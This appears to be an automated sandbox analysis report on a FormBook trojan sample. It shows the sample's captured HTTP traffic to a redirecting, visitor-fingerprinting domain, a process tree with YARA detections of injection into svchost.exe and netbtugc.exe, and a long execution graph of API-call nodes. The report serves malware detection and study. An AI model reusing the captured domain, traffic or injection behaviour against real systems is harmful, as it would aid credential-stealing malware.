                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:55:49.395872116 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:49 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395749.5537822; expires=Fri, 06-Oct-2034 13:55:49 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-length: 1556
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 49 34 45 54 35 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 7a 76 70 62 46 68 45 5a 58 50 72 45 64 52 4f 67 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 76 37 76 44 46 41 6c 53 4c 45 66 50 4d 45 4f 70 49 69 50 76 2b 7a 50 35 6d 78 65 53 38 6c 68 2b 5a 6b 31 32 4a 6b 53 41 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></hea
                                                                                              Oct 8, 2024 15:55:49.395889044 CEST | 592 | IN | Data Raw: 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74
                                                                                              Data Ascii: d><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkS



                                                                                              Target ID:0
                                                                                              Start time:09:52:34
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Users\user\Desktop\jpdy1E8K4A.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\jpdy1E8K4A.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'401'503 bytes
                                                                                              MD5 hash:473DF0A675CEABA5A7C27F100E7D7491
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:09:52:35
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\jpdy1E8K4A.exe"
                                                                                              Imagebase:0xe80000
                                                                                              File size:46'504 bytes
                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:09:52:48
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe"
                                                                                              Imagebase:0x490000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:5
                                                                                              Start time:09:52:51
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                              Imagebase:0x370000
                                                                                              File size:22'016 bytes
                                                                                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Target ID:8
                                                                                              Start time:09:53:26
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff728280000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true


                                                                                                Execution Graph

                                                                                                Execution Coverage:3.4%
                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                Signature Coverage:9.6%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:36
execution_graph
calls 87590->87591 87594 414c38 setSBCS 87590->87594 87600 41dfcc 87590->87600 87630 41d8f3 87590->87630 87652 41e0c2 46 API calls 3 library calls 87590->87652 87591->87590 87653 417f77 46 API calls __getptd_noexit 87594->87653 87596 414ae7 87651 417f25 10 API calls __write_nolock 87596->87651 87597->87578 87598->87574 87599->87574 87601 41dfd8 _flsall 87600->87601 87602 41dfe0 87601->87602 87603 41dffb 87601->87603 87723 417f8a 46 API calls __getptd_noexit 87602->87723 87605 41e007 87603->87605 87608 41e041 87603->87608 87725 417f8a 46 API calls __getptd_noexit 87605->87725 87606 41dfe5 87724 417f77 46 API calls __getptd_noexit 87606->87724 87611 41e063 87608->87611 87612 41e04e 87608->87612 87610 41e00c 87726 417f77 46 API calls __getptd_noexit 87610->87726 87616 41ae56 ___lock_fhandle 48 API calls 87611->87616 87728 417f8a 46 API calls __getptd_noexit 87612->87728 87614 41e014 87727 417f25 10 API calls __write_nolock 87614->87727 87618 41e069 87616->87618 87617 41e053 87729 417f77 46 API calls __getptd_noexit 87617->87729 87621 41e077 87618->87621 87622 41e08b 87618->87622 87654 41da15 87621->87654 87730 417f77 46 API calls __getptd_noexit 87622->87730 87624 41dfed _flsall 87624->87590 87626 41e083 87732 41e0ba LeaveCriticalSection __unlock_fhandle 87626->87732 87627 41e090 87731 417f8a 46 API calls __getptd_noexit 87627->87731 87631 41d900 87630->87631 87635 41d915 87630->87635 87736 417f77 46 API calls __getptd_noexit 87631->87736 87633 41d905 87737 417f25 10 API calls __write_nolock 87633->87737 87636 41d910 87635->87636 87637 41d94a 87635->87637 87733 420603 87635->87733 87636->87590 87639 414139 __flswbuf 46 API calls 87637->87639 87640 41d95e 87639->87640 87641 41dfcc __read 59 API calls 87640->87641 87642 41d965 87641->87642 87642->87636 87643 414139 __flswbuf 46 API calls 87642->87643 87644 41d988 87643->87644 87644->87636 87645 414139 __flswbuf 46 API calls 87644->87645 87646 41d994 87645->87646 87646->87636 87647 414139 __flswbuf 46 API calls 
87646->87647 87648 41d9a1 87647->87648 87649 414139 __flswbuf 46 API calls 87648->87649 87649->87636 87650->87596 87651->87584 87652->87590 87653->87596 87655 41da31 87654->87655 87656 41da4c 87654->87656 87657 417f8a __write_nolock 46 API calls 87655->87657 87658 41da5b 87656->87658 87660 41da7a 87656->87660 87659 41da36 87657->87659 87661 417f8a __write_nolock 46 API calls 87658->87661 87663 417f77 __write_nolock 46 API calls 87659->87663 87662 41da98 87660->87662 87677 41daac 87660->87677 87664 41da60 87661->87664 87665 417f8a __write_nolock 46 API calls 87662->87665 87666 41da3e 87663->87666 87668 417f77 __write_nolock 46 API calls 87664->87668 87670 41da9d 87665->87670 87666->87626 87667 41db02 87669 417f8a __write_nolock 46 API calls 87667->87669 87671 41da67 87668->87671 87672 41db07 87669->87672 87673 417f77 __write_nolock 46 API calls 87670->87673 87674 417f25 __write_nolock 10 API calls 87671->87674 87675 417f77 __write_nolock 46 API calls 87672->87675 87676 41daa4 87673->87676 87674->87666 87675->87676 87680 417f25 __write_nolock 10 API calls 87676->87680 87677->87666 87677->87667 87678 41dae1 87677->87678 87679 41db1b 87677->87679 87678->87667 87681 41daec ReadFile 87678->87681 87683 416b04 __malloc_crt 46 API calls 87679->87683 87680->87666 87684 41dc17 87681->87684 87685 41df8f GetLastError 87681->87685 87686 41db31 87683->87686 87684->87685 87691 41dc2b 87684->87691 87687 41de16 87685->87687 87688 41df9c 87685->87688 87689 41db59 87686->87689 87690 41db3b 87686->87690 87695 417f9d __dosmaperr 46 API calls 87687->87695 87702 41dd9b 87687->87702 87693 417f77 __write_nolock 46 API calls 87688->87693 87692 420494 __lseeki64_nolock 48 API calls 87689->87692 87694 417f77 __write_nolock 46 API calls 87690->87694 87691->87702 87704 41de5b 87691->87704 87705 41dc47 87691->87705 87697 41db67 87692->87697 87698 41dfa1 87693->87698 87696 41db40 87694->87696 87695->87702 87699 417f8a __write_nolock 46 API calls 87696->87699 87697->87681 87700 417f8a 
__write_nolock 46 API calls 87698->87700 87699->87666 87700->87702 87701 413748 _free 46 API calls 87701->87666 87702->87666 87702->87701 87703 41ded0 ReadFile 87708 41deef GetLastError 87703->87708 87716 41def9 87703->87716 87704->87702 87704->87703 87706 41dcab ReadFile 87705->87706 87711 41dd28 87705->87711 87707 41dcc9 GetLastError 87706->87707 87715 41dcd3 87706->87715 87707->87705 87707->87715 87708->87704 87708->87716 87709 41ddec MultiByteToWideChar 87709->87702 87710 41de10 GetLastError 87709->87710 87710->87687 87711->87702 87712 41dda3 87711->87712 87713 41dd96 87711->87713 87718 41dd60 87711->87718 87712->87718 87719 41ddda 87712->87719 87714 417f77 __write_nolock 46 API calls 87713->87714 87714->87702 87715->87705 87720 420494 __lseeki64_nolock 48 API calls 87715->87720 87716->87704 87717 420494 __lseeki64_nolock 48 API calls 87716->87717 87717->87716 87718->87709 87721 420494 __lseeki64_nolock 48 API calls 87719->87721 87720->87715 87722 41dde9 87721->87722 87722->87709 87723->87606 87724->87624 87725->87610 87726->87614 87727->87624 87728->87617 87729->87614 87730->87627 87731->87626 87732->87624 87734 416b04 __malloc_crt 46 API calls 87733->87734 87735 420618 87734->87735 87735->87637 87736->87633 87737->87636 87741 4148b3 GetSystemTimeAsFileTime __aulldiv 87738->87741 87740 442c6b 87740->87244 87741->87740 87742->87251 87743->87257 87744->87257 87748 45272f __tzset_nolock _wcscpy 87745->87748 87746 4528a4 87746->87166 87746->87167 87747 414d04 61 API calls __fread_nolock 87747->87748 87748->87746 87748->87747 87749 44afef GetSystemTimeAsFileTime 87748->87749 87750 4150d1 81 API calls _fseek 87748->87750 87749->87748 87750->87748 87752 44b1bc 87751->87752 87753 44b1ca 87751->87753 87754 4149c2 116 API calls 87752->87754 87755 44b1e1 87753->87755 87756 44b1d8 87753->87756 87757 4149c2 116 API calls 87753->87757 87754->87753 87786 4321a4 87755->87786 87756->87195 87759 44b2db 87757->87759 87759->87755 87761 44b2e9 87759->87761 87760 44b224 87762 
44b253 87760->87762 87763 44b228 87760->87763 87764 44b2f6 87761->87764 87767 414a46 __fcloseall 82 API calls 87761->87767 87790 43213d 87762->87790 87766 44b235 87763->87766 87769 414a46 __fcloseall 82 API calls 87763->87769 87764->87195 87770 44b245 87766->87770 87773 414a46 __fcloseall 82 API calls 87766->87773 87767->87764 87768 44b25a 87771 44b260 87768->87771 87772 44b289 87768->87772 87769->87766 87770->87195 87774 44b26d 87771->87774 87776 414a46 __fcloseall 82 API calls 87771->87776 87800 44b0bf 87 API calls 87772->87800 87773->87770 87777 44b27d 87774->87777 87779 414a46 __fcloseall 82 API calls 87774->87779 87776->87774 87777->87195 87778 44b28f 87801 4320f8 46 API calls _free 87778->87801 87779->87777 87781 44b2a2 87784 44b2b2 87781->87784 87785 414a46 __fcloseall 82 API calls 87781->87785 87782 44b295 87782->87781 87783 414a46 __fcloseall 82 API calls 87782->87783 87783->87781 87784->87195 87785->87784 87787 4321b4 __tzset_nolock _memmove 87786->87787 87788 4321cb 87786->87788 87787->87760 87789 414d04 __fread_nolock 61 API calls 87788->87789 87789->87787 87791 4135bb _malloc 46 API calls 87790->87791 87792 432150 87791->87792 87793 4135bb _malloc 46 API calls 87792->87793 87794 432162 87793->87794 87795 4135bb _malloc 46 API calls 87794->87795 87796 432174 87795->87796 87799 432189 87796->87799 87802 4320f8 46 API calls _free 87796->87802 87798 432198 87798->87768 87799->87768 87800->87778 87801->87782 87802->87798 87803->87097 87804->87098 87805->87114 87806->87114 87807->87114 87808->87108 87809->87114 87810->87114 87811->87121 87812->87131 87813->87130 87814->87130 87864 410160 87815->87864 87817 41012f GetFullPathNameW 87818 410147 moneypunct 87817->87818 87818->86952 87820 4102cb SHGetDesktopFolder 87819->87820 87823 410333 _wcsncpy 87819->87823 87821 4102e0 _wcsncpy 87820->87821 87820->87823 87822 41031c SHGetPathFromIDListW 87821->87822 87821->87823 87822->87823 87823->86955 87825 425f4a 87824->87825 87826 4101bb 87824->87826 87829 4114ab 
__wcsicoll 58 API calls 87825->87829 87832 425f6e 87825->87832 87827 410160 52 API calls 87826->87827 87828 4101c7 87827->87828 87868 410200 52 API calls 2 library calls 87828->87868 87829->87825 87831 4101d6 87869 410200 52 API calls 2 library calls 87831->87869 87832->86957 87834 4101e9 87834->86957 87836 40f760 128 API calls 87835->87836 87837 40f584 87836->87837 87838 429335 87837->87838 87839 40f58c 87837->87839 87842 4528bd 118 API calls 87838->87842 87840 40f598 87839->87840 87841 429358 87839->87841 87894 4033c0 113 API calls 7 library calls 87840->87894 87895 434034 86 API calls _wprintf 87841->87895 87845 42934b 87842->87845 87848 429373 87845->87848 87849 42934f 87845->87849 87846 429369 87846->87848 87847 40f5b4 87847->86954 87850 4115d7 52 API calls 87848->87850 87851 431e58 82 API calls 87849->87851 87858 4293c5 moneypunct 87850->87858 87851->87841 87852 42959c 87853 413748 _free 46 API calls 87852->87853 87854 4295a5 87853->87854 87855 431e58 82 API calls 87854->87855 87856 4295b1 87855->87856 87858->87852 87861 401b10 52 API calls 87858->87861 87870 444af8 87858->87870 87873 44b41c 87858->87873 87880 402780 87858->87880 87888 4022d0 87858->87888 87896 44c7dd 64 API calls 3 library calls 87858->87896 87861->87858 87865 410167 _wcslen 87864->87865 87866 4115d7 52 API calls 87865->87866 87867 41017e _wcscpy 87866->87867 87867->87817 87868->87831 87869->87834 87871 4115d7 52 API calls 87870->87871 87872 444b27 _memmove 87871->87872 87872->87858 87874 44b429 87873->87874 87875 4115d7 52 API calls 87874->87875 87876 44b440 87875->87876 87877 44b45e 87876->87877 87878 401b10 52 API calls 87876->87878 87877->87858 87879 44b453 87878->87879 87879->87858 87881 402827 87880->87881 87884 402790 moneypunct _memmove 87880->87884 87883 4115d7 52 API calls 87881->87883 87882 4115d7 52 API calls 87885 402797 87882->87885 87883->87884 87884->87882 87886 4027bd 87885->87886 87887 4115d7 52 API calls 87885->87887 87886->87858 87887->87886 87889 4022e0 87888->87889 
87891 40239d 87888->87891 87890 4115d7 52 API calls 87889->87890 87889->87891 87892 402320 moneypunct 87889->87892 87890->87892 87891->87858 87892->87891 87893 4115d7 52 API calls 87892->87893 87893->87892 87894->87847 87895->87846 87896->87858 87898 402539 moneypunct 87897->87898 87899 402417 87897->87899 87898->86961 87899->87898 87900 4115d7 52 API calls 87899->87900 87901 402443 87900->87901 87902 4115d7 52 API calls 87901->87902 87903 4024b4 87902->87903 87903->87898 87905 4022d0 52 API calls 87903->87905 87926 402880 95 API calls 2 library calls 87903->87926 87905->87903 87911 401566 87906->87911 87907 401794 87927 40e9a0 90 API calls 87907->87927 87910 4010a0 52 API calls 87910->87911 87911->87907 87911->87910 87912 40167a 87911->87912 87913 4017c0 87912->87913 87928 45e737 90 API calls 3 library calls 87912->87928 87913->86963 87915 40bc70 52 API calls 87914->87915 87924 40d451 87915->87924 87916 40d50f 87931 410600 52 API calls 87916->87931 87918 427c01 87932 45e737 90 API calls 3 library calls 87918->87932 87919 40e0a0 52 API calls 87919->87924 87921 401b10 52 API calls 87921->87924 87922 40d519 87922->86966 87924->87916 87924->87918 87924->87919 87924->87921 87924->87922 87929 40f310 53 API calls 87924->87929 87930 40d860 91 API calls 87924->87930 87926->87903 87927->87912 87928->87913 87929->87924 87930->87924 87931->87922 87932->87922 87933->86980 87934->86979 87936 42c5fe 87935->87936 87951 4091c6 87935->87951 87937 40bc70 52 API calls 87936->87937 87936->87951 87938 42c64e InterlockedIncrement 87937->87938 87939 42c665 87938->87939 87945 42c697 87938->87945 87942 42c672 InterlockedDecrement Sleep InterlockedIncrement 87939->87942 87939->87945 87940 42c737 InterlockedDecrement 87941 42c74a 87940->87941 87944 408f40 VariantClear 87941->87944 87942->87939 87942->87945 87943 42c731 87943->87940 87947 42c752 87944->87947 87945->87940 87945->87943 88219 408e80 87945->88219 88228 410c60 VariantClear moneypunct 87947->88228 87951->87042 87952 42c6db 87953 
402160 52 API calls 87952->87953 87954 42c6e5 87953->87954 88224 45340c 85 API calls 87954->88224 87956 42c6f1 88225 40d200 52 API calls 2 library calls 87956->88225 87958 42c6fb 88226 465124 53 API calls 87958->88226 87960 42c715 87961 42c76a 87960->87961 87962 42c719 87960->87962 87963 401b10 52 API calls 87961->87963 88227 46fe32 VariantClear 87962->88227 87965 42c77e 87963->87965 87966 401980 53 API calls 87965->87966 87972 42c796 87966->87972 87967 42c812 88230 46fe32 VariantClear 87967->88230 87969 42c82a InterlockedDecrement 88231 46ff07 54 API calls 87969->88231 87971 42c864 88232 45e737 90 API calls 3 library calls 87971->88232 87972->87967 87972->87971 88229 40ba10 52 API calls 2 library calls 87972->88229 87973 42c9ec 88275 47d33e 329 API calls 87973->88275 87977 42c9fe 88276 46feb1 VariantClear VariantClear 87977->88276 87979 401980 53 API calls 87989 42c849 87979->87989 87980 408f40 VariantClear 87980->87989 87981 42ca08 87983 401b10 52 API calls 87981->87983 87982 402780 52 API calls 87982->87989 87985 42ca15 87983->87985 87984 408f40 VariantClear 87986 42c891 87984->87986 87987 40c2c0 52 API calls 87985->87987 88233 410c60 VariantClear moneypunct 87986->88233 87990 42c874 87987->87990 87989->87973 87989->87979 87989->87980 87989->87982 88234 40a780 87989->88234 87990->87984 87992 42ca59 87990->87992 87992->87992 87994 40afc4 87993->87994 87995 40b156 87993->87995 87996 40afd5 87994->87996 87997 42d1e3 87994->87997 88286 45e737 90 API calls 3 library calls 87995->88286 88001 40a780 192 API calls 87996->88001 88015 40b11a moneypunct 87996->88015 88287 45e737 90 API calls 3 library calls 87997->88287 88000 42d1f8 88006 408f40 VariantClear 88000->88006 88004 40b00a 88001->88004 88002 40b143 88002->87042 88004->88000 88007 40b012 88004->88007 88005 42d4db 88005->88005 88006->88002 88008 40b04a 88007->88008 88009 40b094 moneypunct 88007->88009 88011 42d231 VariantClear 88007->88011 88017 40b05c moneypunct 88008->88017 88288 40e270 VariantClear moneypunct 
88008->88288 88010 40b108 88009->88010 88014 42d425 moneypunct 88009->88014 88010->88015 88289 40e270 VariantClear moneypunct 88010->88289 88011->88017 88012 42d45a VariantClear 88012->88015 88014->88012 88014->88015 88015->88002 88290 45e737 90 API calls 3 library calls 88015->88290 88016 4115d7 52 API calls 88016->88009 88017->88009 88017->88016 88020 408fff 88019->88020 88039 40900d 88019->88039 88291 403ea0 52 API calls __cinit 88020->88291 88023 42c3f6 88294 45e737 90 API calls 3 library calls 88023->88294 88025 42c44a 88296 45e737 90 API calls 3 library calls 88025->88296 88026 40a780 192 API calls 88026->88039 88027 42c47b 88297 451b42 61 API calls 88027->88297 88031 42c4cb 88299 47faae 231 API calls 88031->88299 88032 42c564 88033 408f40 VariantClear 88032->88033 88049 4090f2 moneypunct 88033->88049 88034 42c491 88034->88049 88298 45e737 90 API calls 3 library calls 88034->88298 88036 42c548 88302 45e737 90 API calls 3 library calls 88036->88302 88037 42c4da 88037->88049 88300 45e737 90 API calls 3 library calls 88037->88300 88038 409112 88038->88036 88047 40912b 88038->88047 88039->88023 88039->88025 88039->88026 88039->88027 88039->88031 88039->88032 88039->88036 88039->88038 88040 4090df 88039->88040 88042 42c528 88039->88042 88044 4090ea 88039->88044 88039->88049 88293 4534e3 52 API calls 88039->88293 88295 40c4e0 192 API calls 88039->88295 88040->88044 88045 408e80 VariantClear 88040->88045 88301 45e737 90 API calls 3 library calls 88042->88301 88050 408f40 VariantClear 88044->88050 88045->88044 88047->88049 88292 403e10 53 API calls 88047->88292 88049->87042 88050->88049 88052 40914b 88053 408f40 VariantClear 88052->88053 88053->88049 88303 408d90 88054->88303 88056 429778 88332 410c60 VariantClear moneypunct 88056->88332 88058 429780 88059 408cf9 88059->88056 88060 42976c 88059->88060 88062 408d2d 88059->88062 88331 45e737 90 API calls 3 library calls 88060->88331 88319 403d10 88062->88319 88065 408d71 moneypunct 88065->87042 88066 408d45 moneypunct 
88066->88065 88067 408f40 VariantClear 88066->88067 88067->88066 88069 4096c6 _wcslen 88068->88069 88070 4115d7 52 API calls 88069->88070 88132 40a70c moneypunct _memmove 88069->88132 88071 4096fa _memmove 88070->88071 88073 4115d7 52 API calls 88071->88073 88072 4013a0 52 API calls 88075 4297aa 88072->88075 88074 40971b 88073->88074 88076 409749 CharUpperBuffW 88074->88076 88079 40976a moneypunct 88074->88079 88074->88132 88077 4115d7 52 API calls 88075->88077 88076->88079 88118 4297d1 _memmove 88077->88118 88127 4097e5 moneypunct 88079->88127 88610 47dcbb 194 API calls 88079->88610 88081 408f40 VariantClear 88082 42ae92 88081->88082 88637 410c60 VariantClear moneypunct 88082->88637 88084 42aea4 88085 409aa2 88087 4115d7 52 API calls 88085->88087 88092 409afe 88085->88092 88085->88118 88086 40a689 88089 4115d7 52 API calls 88086->88089 88087->88092 88088 4115d7 52 API calls 88088->88127 88105 40a6af moneypunct _memmove 88089->88105 88090 409b2a 88094 429dbe 88090->88094 88154 409b4d moneypunct _memmove 88090->88154 88618 40b400 VariantClear VariantClear moneypunct 88090->88618 88091 40c2c0 52 API calls 88091->88127 88092->88090 88093 4115d7 52 API calls 88092->88093 88095 429d31 88093->88095 88100 429dd3 88094->88100 88619 40b400 VariantClear VariantClear moneypunct 88094->88619 88099 429d42 88095->88099 88615 44a801 52 API calls 88095->88615 88096 429a46 VariantClear 88096->88127 88097 409fd2 88102 40a045 88097->88102 88156 42a3f5 88097->88156 88109 40e0a0 52 API calls 88099->88109 88100->88154 88620 40e1c0 VariantClear moneypunct 88100->88620 88107 4115d7 52 API calls 88102->88107 88103 408f40 VariantClear 88103->88127 88112 4115d7 52 API calls 88105->88112 88113 40a04c 88107->88113 88114 429d57 88109->88114 88112->88132 88117 40a0a7 88113->88117 88121 4091e0 315 API calls 88113->88121 88616 453443 52 API calls 88114->88616 88116 42a42f 88624 45e737 90 API calls 3 library calls 88116->88624 88139 40a0af 88117->88139 88625 40c790 VariantClear moneypunct 
88117->88625 88636 45e737 90 API calls 3 library calls 88118->88636 88119 4299d9 88123 408f40 VariantClear 88119->88123 88121->88117 88122 429abd 88122->87042 88128 4299e2 88123->88128 88124 429d88 88617 453443 52 API calls 88124->88617 88127->88085 88127->88086 88127->88088 88127->88091 88127->88096 88127->88103 88127->88105 88127->88118 88127->88119 88127->88122 88130 42a452 88127->88130 88134 40a780 192 API calls 88127->88134 88611 40c4e0 192 API calls 88127->88611 88613 40ba10 52 API calls 2 library calls 88127->88613 88614 40e270 VariantClear moneypunct 88127->88614 88612 410c60 VariantClear moneypunct 88128->88612 88130->88081 88132->88072 88134->88127 88135 402780 52 API calls 88135->88154 88137 408f40 VariantClear 88168 40a162 moneypunct _memmove 88137->88168 88138 41130a 51 API calls __cinit 88138->88154 88140 40a11b 88139->88140 88142 42a4b4 VariantClear 88139->88142 88139->88168 88146 40a12d moneypunct 88140->88146 88626 40e270 VariantClear moneypunct 88140->88626 88141 40a780 192 API calls 88141->88154 88142->88146 88143 401980 53 API calls 88143->88154 88144 408e80 VariantClear 88144->88154 88147 4115d7 52 API calls 88146->88147 88146->88168 88147->88168 88148 408e80 VariantClear 88148->88168 88150 44a801 52 API calls 88150->88154 88151 42a74d VariantClear 